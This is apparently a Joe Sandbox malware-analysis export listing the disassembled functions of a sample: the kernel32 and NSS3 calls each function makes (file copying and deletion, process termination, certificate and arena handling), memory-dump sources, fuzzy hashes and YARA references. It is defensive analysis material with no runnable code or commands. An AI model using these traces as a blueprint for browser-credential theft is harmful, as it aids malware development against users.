Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 9b2188abffe4471297084dac998a9b048ae064bc09d84114026fa6f0d8163ca5
Instruction ID: 162d81c4115327cad2d90a4646ceafcd461c8548bb683692fb80484d8e509b44
Opcode Fuzzy Hash: 9b2188abffe4471297084dac998a9b048ae064bc09d84114026fa6f0d8163ca5
Instruction Fuzzy Hash: 2411B4F1B003415EDB049F5E8E06BA23AB89356208F145239E70ADBF61E771D48A4BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00415450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
wsprintfW.USER32 ref: 00415478

Strings

%hs, xrefs: 0041546F

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB50 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
lstrlen.KERNEL32(00000000), ref: 0040CDE8
lstrlen.KERNEL32(00000000), ref: 0040CDFC
DeleteFileA.KERNEL32(00000000), ref: 0040CE75

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c1857c6a5c231edcfa34ebdfcff9ac67d93d66d9a968bca05162a8460d565fbb
Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
Opcode Fuzzy Hash: c1857c6a5c231edcfa34ebdfcff9ac67d93d66d9a968bca05162a8460d565fbb
Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 6C9A0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C98C97F,?,?,?), ref: 6C9A04BF
TlsGetValue.KERNEL32(00000000,?,6C98C97F,?,?,?), ref: 6C9A04F4
EnterCriticalSection.KERNEL32(?,?,?,6C98C97F,?,?,?), ref: 6C9A050D
PR_Unlock.NSS3(?,?,?,?,6C98C97F,?,?,?), ref: 6C9A0556

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: 514055ebe73f3607c81a16725c0c82ba258886c21a6688c280160f8250ae1942
Instruction ID: fdecd55835aeb41cafe3c461619d8f18709e3961c5c137dfff9d2844a2bf94c1
Opcode Fuzzy Hash: 514055ebe73f3607c81a16725c0c82ba258886c21a6688c280160f8250ae1942
Instruction Fuzzy Hash: BD416DB4A056428FDB04DF6AC580669BBF4FF44318F15A56DD89A8BB01E730E892CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6C956C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C956C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C956CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C956CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CA78FE0), ref: 6C956CFE

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: e5d6b70463ca04860aa1a03ea05dd4124cd5b6bd3c657077ca1b97cddec97a3c
Instruction ID: e4068481f6de88cf711b3a4c5f74836312ea756e50fa8388a82b1c8a104c720f
Opcode Fuzzy Hash: e5d6b70463ca04860aa1a03ea05dd4124cd5b6bd3c657077ca1b97cddec97a3c
Instruction Fuzzy Hash: 1631AEB1A002169FEB08CF65CC91ABFBBF9EF95248B50442DD905E7710EB31D915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415BEB

Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
CloseHandle.KERNEL32(00000000), ref: 00415CD6

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: d3994fdeab40983a441a68097a461e1d21d833049bc6d2065065ec80ed2014dd
Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
Opcode Fuzzy Hash: d3994fdeab40983a441a68097a461e1d21d833049bc6d2065065ec80ed2014dd
Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6C956420 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C955DEF,?,?,?), ref: 6C956456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C955DEF,?,?,?), ref: 6C956476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C955DEF,?,?,?), ref: 6C9564A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C955DEF,?,?,?), ref: 6C9564C2

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID:
API String ID: 3886907618-0
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: 6712a58c092791c7e24f9b2527591ecb13d2c3dc258261cb8120c933ec0bb400
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: 4221E7B1A002016BFB20DF28DC45BA376EDEB50318F944538F91AC6B51E7B2D568C791

Uniqueness

Uniqueness Score: -1.00%

Function 6C9A4590 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A459B

Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15

TlsGetValue.KERNEL32(?,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A45BF
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A45D3
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A45E8

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
String ID:
API String ID: 2963671366-0
Opcode ID: ab465facdf5eaf45c795dce11a411af854bc29b7d3c7ada8834f51d737b4681b
Instruction ID: 323806f5412da8918090851f9f455754c73a2076cac0596d3f5becc821b44744
Opcode Fuzzy Hash: ab465facdf5eaf45c795dce11a411af854bc29b7d3c7ada8834f51d737b4681b
Instruction Fuzzy Hash: B521F5B0E00207AFDB049FA9DC045AABBB8FF19319F008539D848D7B20EB31E556CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C9404D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C9404F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C94053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C940558
GetLastError.KERNEL32 ref: 6C94057A

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: cf64a179d15e1c4615cb14f5b8bee22c771318ddd6d5a04219ce5541816a5296
Instruction ID: e72f6dd06a30c3aec160e3bd8b90284d11850ab3d3db29d7018f14e40fb7b82a
Opcode Fuzzy Hash: cf64a179d15e1c4615cb14f5b8bee22c771318ddd6d5a04219ce5541816a5296
Instruction Fuzzy Hash: FD216571A002199FDB08DF99DC94A9EB7B8FF48318B108169E809DB351D735ED06CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C97ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C97ACC2

Part of subcall function 6C952F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C952F0A
Part of subcall function 6C952F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C952F1D

Part of subcall function 6C952AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C950A1B,00000000), ref: 6C952AF0
Part of subcall function 6C952AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C952B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C97AD5E

Part of subcall function 6C9957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C95B41E,00000000,00000000,?,00000000,?,6C95B41E,00000000,00000000,00000001,?), ref: 6C9957E0
Part of subcall function 6C9957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C995843

CERT_DestroyCertList.NSS3(?), ref: 6C97AD36

Part of subcall function 6C952F50: CERT_DestroyCertificate.NSS3(?), ref: 6C952F65
Part of subcall function 6C952F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C952F83

free.MOZGLUE(?), ref: 6C97AD4F

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 5882ff84e09542155d21a842b946bc8a82cfedec18c8c3b5404cfc060307ca81
Instruction ID: 3ab1e74c994c762f6facd665ca85600758d5c3d2594ff3ffbf60dd2e889b1bce
Opcode Fuzzy Hash: 5882ff84e09542155d21a842b946bc8a82cfedec18c8c3b5404cfc060307ca81
Instruction Fuzzy Hash: 5E21C6B1D012058BEB20DFA4E9055EE77B4AF15248F455168D8057B700FB31EA69CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9924E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C9924FF
EnterCriticalSection.KERNEL32(?), ref: 6C99250F
PR_Unlock.NSS3(?), ref: 6C99253C
PR_SetError.NSS3(00000000,00000000), ref: 6C992554

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: d25db421ebcf5973582eabdac1f3ec8d08c547401c57a086fca624da137d3ec8
Instruction ID: 542cfe7191c1e741e39d570217d01700996d2b0528fc94925f98fd6604b19371
Opcode Fuzzy Hash: d25db421ebcf5973582eabdac1f3ec8d08c547401c57a086fca624da137d3ec8
Instruction Fuzzy Hash: 5511E97190020A6BDB00AF68EC459BF7B7CEF19228B458124ED0997711E731E955C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C9AECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C9AF0AD,6C9AF150,?,6C9AF150,?,?,?), ref: 6C9AECBA

Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C9AECD1

Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C9AED02

Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C9AED5A

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 07d92754c4575f3636753ee24cd719d238ac1781712cd8709813b0646f2478e1
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 8221A1B1A00742ABE700CF25D944B52B7E4BFA5348F25C219E81C97A61FB70E5A5C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 6C9DEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEE14

Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15

memcpy.VCRUNTIME140(?,?,6C9C9767,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEE33

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 95f0d0b5b3f591f348ad781117b8b7fefd0381b2ce4e9c47e6a596e09a2811ff
Instruction ID: 3e6bd49ff5cb9b40c8b43c836203f7f1d8f572aab199a1b90219098ae75cdbeb
Opcode Fuzzy Hash: 95f0d0b5b3f591f348ad781117b8b7fefd0381b2ce4e9c47e6a596e09a2811ff
Instruction Fuzzy Hash: CA11C2B1A00B07ABEB109EA5DC84B56F3ACEF1035DF228531E919A2A00E731F464C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 6C978DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C978DE7
EnterCriticalSection.KERNEL32 ref: 6C978DFC
PR_Unlock.NSS3 ref: 6C978E2D
PR_SetError.NSS3 ref: 6C978E49

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 188dfca3ecd4e80e4db713ee868aacf23d6be5f1c8e4ea7f2e0845bb0644c515
Instruction ID: a46d2c44993041fd36a023cbfa43823352badbede3dd180b8fa72ce7bae09f5d
Opcode Fuzzy Hash: 188dfca3ecd4e80e4db713ee868aacf23d6be5f1c8e4ea7f2e0845bb0644c515
Instruction Fuzzy Hash: E4118C71605A029BD704BF78D4882AABBF4FF15354F018929DC98D7B00E734E895CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6C9FAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C9E5F17,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C9E5F17,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FACDB

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
